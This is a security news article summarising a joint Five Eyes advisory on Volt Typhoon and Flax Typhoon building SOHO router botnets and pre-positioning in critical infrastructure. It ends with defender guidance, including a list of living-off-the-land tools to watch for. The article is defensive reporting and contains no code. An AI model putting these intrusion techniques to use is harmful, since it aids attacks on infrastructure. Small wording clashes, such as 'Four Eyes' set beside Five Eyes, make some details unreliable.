🛡️ SecOps

Five Eyes Advisory: China-Nexus Volt Typhoon and Flax Typhoon Using SOHO Router Botnets to Pre-Position in Critical Infrastructure

A joint advisory from CISA, NCSC-UK, the Australian Signals Directorate, and Four Eyes partners confirms that China-linked threat actors including Volt Typhoon and Flax Typhoon are systematically compromising small-office and home-office routers to build operational relay networks for espionage and pre-positioned attacks against critical national infrastructure. Organisations should audit edge device inventories and enforce firmware update policies.

4 min read
#volt-typhoon#flax-typhoon#china#soho-routers#botnet#critical-infrastructure#five-eyes#nation-state

A joint advisory from the US Cybersecurity and Infrastructure Security Agency, the UK National Cyber Security Centre, Australia’s ASD/ACSC, and partner agencies in Canada and New Zealand has formally confirmed that China state-sponsored threat actors — operating under the designations Volt Typhoon and Flax Typhoon — are systematically building and operating SOHO (small-office/home-office) router botnets as operational relay infrastructure for espionage campaigns and pre-positioned attacks against Western critical infrastructure sectors.

What the Advisory Describes

The advisory, designated AA26-113A, synthesises intelligence gathered across the Five Eyes alliance and describes a coherent Chinese strategic programme — rather than opportunistic exploitation — involving several distinct actor clusters:

Volt Typhoon (Microsoft/CISA designation) focuses on critical national infrastructure pre-positioning: compromising systems in telecommunications, energy, water utilities, transportation, and government networks — not to immediately cause damage, but to establish durable footholds that could be activated in a future conflict scenario. Volt Typhoon’s operations are characterised by extreme operational patience and a heavy reliance on living-off-the-land techniques to blend with legitimate administrative traffic.

Flax Typhoon (Microsoft designation) operates a large botnet — tracked separately as Raptor Train by Black Lotus Labs, attributed to the contractor Integrity Technology Group by the US DoJ’s October 2024 disruption operation — that served as the operational relay layer for both espionage and potential sabotage activities. The advisory confirms that the October 2024 disruption reduced but did not eliminate Flax Typhoon’s infrastructure.

The advisory details the SOHO router botnet methodology: actors compromise internet-facing devices — predominantly Cisco IOS routers, DrayTek routers, Netgear devices, and Zyxel firewalls — via known CVEs and default credentials, then use the compromised device population as a traffic-forwarding layer that routes all C2 communications through geographically distributed “legitimate” IP addresses. When defenders investigate anomalous connections, they trace back to a consumer router in a different country — not to attacker infrastructure.

The Strategic Significance

What distinguishes Volt Typhoon’s campaign from traditional espionage operations is the advisory’s explicit language about pre-positioning: the advisory states that the intelligence community assesses Chinese actors are establishing persistent access that would allow disruption of communications, transportation, and energy infrastructure in the event of a US-China conflict over Taiwan or in the South China Sea.

This elevates the threat model beyond espionage (data theft) to potential sabotage preparation. The advisory notes evidence of Volt Typhoon actors mapping OT environments, identifying safety system configurations, and in some cases establishing persistence on networks that control physical infrastructure — not merely IT networks.

Enterprise Defender Implications

Most organisations directly affected by Volt Typhoon operations are critical infrastructure operators. However, the advisory has broader implications:

SOHO device security: Organisations that allow employees to work from home via unmanaged personal routers — or that use small business-grade routers in branch offices — are providing the inventory from which this botnet is built. Any SOHO or branch-office router running known-vulnerable firmware is a potential relay node.

VPN and edge device hygiene: Volt Typhoon’s initial access techniques include exploitation of internet-facing network equipment and VPN appliances, consistent with the priority environment’s focus on Palo Alto GlobalProtect, Citrix ADC/Gateway, and Cisco devices. The advisory’s indicators of compromise should be run against VPN gateway logs.

Living-off-the-land detection: LOTL detection — monitoring for use of native system tools (wmic, certutil, regsvr32, netsh) in anomalous patterns — is the primary detection avenue for Volt Typhoon activity. EDR telemetry and SIEM rules configured for LOTL technique detection are more effective than signature-based defences against this actor.

  • Review and apply the advisory’s full IOC list across network logs, firewall logs, and endpoint telemetry
  • Audit all internet-facing routers, firewalls, and VPN appliances for firmware currency — specifically focus on devices matching the advisory’s targeted models
  • Review outbound network traffic from OT and ICS environments for connections to IP ranges listed in the advisory
  • Ensure MFA is enforced on all remote access pathways — Volt Typhoon routinely pivots from compromised edge devices to internal networks via legitimate-looking remote access
  • Forward the advisory to your ISP’s security team if you operate critical infrastructure — several Volt Typhoon TTPs are detectable at the ISP level

Share this article